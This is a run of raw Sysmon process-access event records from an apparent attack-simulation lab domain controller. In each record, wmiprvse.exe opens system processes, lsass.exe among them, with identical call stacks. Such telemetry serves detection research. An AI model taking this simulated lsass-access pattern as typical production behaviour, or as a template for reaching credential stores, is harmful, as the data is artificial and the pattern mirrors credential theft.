22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.224{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.208{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.174{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 